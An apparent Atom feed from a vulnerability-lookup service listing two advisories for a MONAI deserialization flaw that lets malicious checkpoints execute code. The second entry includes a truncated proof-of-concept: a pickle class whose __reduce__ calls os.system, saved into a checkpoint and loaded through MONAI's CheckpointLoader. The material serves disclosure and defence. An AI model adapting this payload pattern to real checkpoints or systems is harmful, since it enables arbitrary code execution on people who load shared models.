<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-02T23:48:12.614806+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cve-2025-58756</id>
    <title>CVE-2025-58756 — MONAI's unsafe torch usage may lead to arbitrary code execution</title>
    <updated>2026-10-02T23:48:12.616553+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Project-MONAI MONAI</p>
<p>MONAI (Medical Open Network for AI) is an AI toolkit for health care imaging. In versions up to and including 1.5.0, in `model_dict = torch.load(full_path, map_location=torch.device(device), weights_only=True)` in monai/bundle/scripts.py , `weights_only=True` is loaded securely. However, insecure loading methods still exist elsewhere in the project, such as when loading checkpoints. This is a common practice when users want to reduce training time and costs by loading pre-trained models downloaded from other platforms. Loading a checkpoint containing malicious content can trigger a deserialization vulnerability, leading to code execution. As of time of publication, no known fixed versions are available.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/cve-2025-58756"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-6vm5-6jv9-rjpj</id>
    <title>GHSA-6vm5-6jv9-rjpj — MONAI: Unsafe torch usage may lead to arbitrary code execution</title>
    <updated>2026-10-02T23:48:12.616606+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: monai</p>
<p>### Summary
In ```model_dict = torch.load(full_path, map_location=torch.device(device), weights_only=True)``` in monai/bundle/scripts.py , ```weights_only=True``` is loaded securely. However, insecure loading methods still exist elsewhere in the project, such as when loading checkpoints.</p>
<p>This is a common practice when users want to reduce training time and costs by loading pre-trained models downloaded from platforms like huggingface.</p>
<p>Loading a checkpoint containing malicious content can trigger a deserialization vulnerability, leading to code execution.</p>
<p>The following proof-of-concept demonstrates the issues that arise when loading insecure checkpoints.</p>
<p>```</p>
<p>import os  
import tempfile  
import json  
import torch  
from pathlib import Path  
  
class MaliciousPayload:  
    def __reduce__(self):  
        return (os.system, ('touch /tmp/hacker2.txt',))  
  
def test_checkpoint_loader_attack():</p>
<p>temp_dir = Path(tempfile.mkdtemp())  
    checkpoint_file = temp_dir / "malicious_checkpoint.pt"</p>
<p>malicious_checkpoint = {  
        'model_state_dict': MaliciousPayload(),  
        'optimizer_state_dict': {},  
        'epoch': 100  
    }</p>
<p>torch.save(malicious_checkpoint, checkpoint_file)  
      
     
    from monai.handlers import CheckpointLoader  
    import torch.nn as nn  
          
 
    model = nn.Linear(10, 1)  
        
    loader = CheckpointLoader(  
        load_path=str(checkpoint_file),  
        load_dict={"model": mode…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-6vm5-6jv9-rjpj"/>
  </entry>
</feed>
